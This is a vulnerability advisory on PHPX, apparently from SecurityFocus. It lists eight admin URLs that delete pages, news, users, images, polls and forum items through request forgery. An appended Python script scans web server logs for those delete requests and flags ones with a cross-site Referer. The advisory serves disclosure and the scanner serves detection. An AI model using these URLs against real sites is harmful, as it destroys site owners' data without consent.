PHPX Multiple Administrator Command Execution Vulnerability

No exploit is required to carry out these issues. The following URI requests are reported to take actions against the affected application; [VID] is an arbitrary attacker-supplied unique identifier:

http://www.example.com/admin/page.php?action=delete&page_id=[VID]
http://www.example.com/admin/news.php?action=delete&news_id=[VID]
http://www.example.com/admin/user.php?action=delete&user_id=[VID]
http://www.example.com/admin/images.php?action=delete&image_id=[VID]
http://www.example.com/admin/page.php?action=deletePoll&poll_id=[VID]
http://www.example.com/admin/forums.php?action=words&subaction=delete&word_id=[VID]
http://www.example.com/admin/forums.php?action=flag&subaction=delete&flag_id=[VID]
http://www.example.com/admin/forums.php?action=xcode&subaction=delete&xcode_id=[VID]
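
As an added defensive example (not part of this advisory or of PHPX), the following Python code matches the URIs listed above against web server access log lines in the common "combined" format and reports every hit on one of the listed admin delete actions, noting whether the Referer was the site itself. The endpoint table is taken from the advisory's URI list; the site host name and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin endpoints from the advisory: (path, action, subaction, id parameter).
PHPX_ADMIN_ACTIONS = [
    ("/admin/page.php",   "delete",     None,     "page_id"),
    ("/admin/news.php",   "delete",     None,     "news_id"),
    ("/admin/user.php",   "delete",     None,     "user_id"),
    ("/admin/images.php", "delete",     None,     "image_id"),
    ("/admin/page.php",   "deletePoll", None,     "poll_id"),
    ("/admin/forums.php", "words",      "delete", "word_id"),
    ("/admin/forums.php", "flag",       "delete", "flag_id"),
    ("/admin/forums.php", "xcode",      "delete", "xcode_id"),
]

# Apache/nginx combined log format: client, user, timestamp, request line, status, size, referer.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')

def match_admin_action(target):
    """Return (path, action, id value) if the request target is one of the
    listed PHPX admin delete actions, otherwise None."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    for path, action, subaction, id_param in PHPX_ADMIN_ACTIONS:
        if (parts.path.endswith(path) and qs.get("action") == [action]
                and (subaction is None or qs.get("subaction") == [subaction])
                and id_param in qs):
            return (path, action, qs[id_param][0])
    return None

def scan_access_log(lines, site_host="www.example.com"):
    """Report every listed admin delete action found in the log lines. A hit whose
    Referer is not the site itself (or is missing) is labelled 'cross-site', since
    the administrator's browser did not reach the action from a local page."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip it
        client, ts, method, target, status, referer = m.groups()
        hit = match_admin_action(target)
        if hit is None:
            continue
        ref_host = urlsplit(referer).netloc if referer and referer != "-" else ""
        findings.append({"client": client, "time": ts, "method": method, "path": hit[0],
                         "action": hit[1], "id": hit[2], "status": status,
                         "referer": "local" if ref_host == site_host else "cross-site"})
    return findings

# Constructed sample log lines (assumption: site installed at the web root).
SAMPLE_LOG = [
    '203.0.113.7 - admin [10/Mar/2010:12:01:05 +0000] "GET /admin/page.php?action=delete&page_id=17 HTTP/1.1" 302 0 "http://www.example.com/admin/page.php"',
    '203.0.113.7 - admin [10/Mar/2010:12:03:22 +0000] "GET /admin/forums.php?action=words&subaction=delete&word_id=4 HTTP/1.1" 302 0 "http://other.example/post.html"',
    '203.0.113.7 - admin [10/Mar/2010:12:04:00 +0000] "GET /admin/page.php?action=edit&page_id=17 HTTP/1.1" 200 512 "http://www.example.com/admin/"',
]
```

Running `scan_access_log(SAMPLE_LOG)` on the constructed lines reports the two delete actions and labels the second one cross-site; the edit request is ignored.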

Copyright 2010, SecurityFocus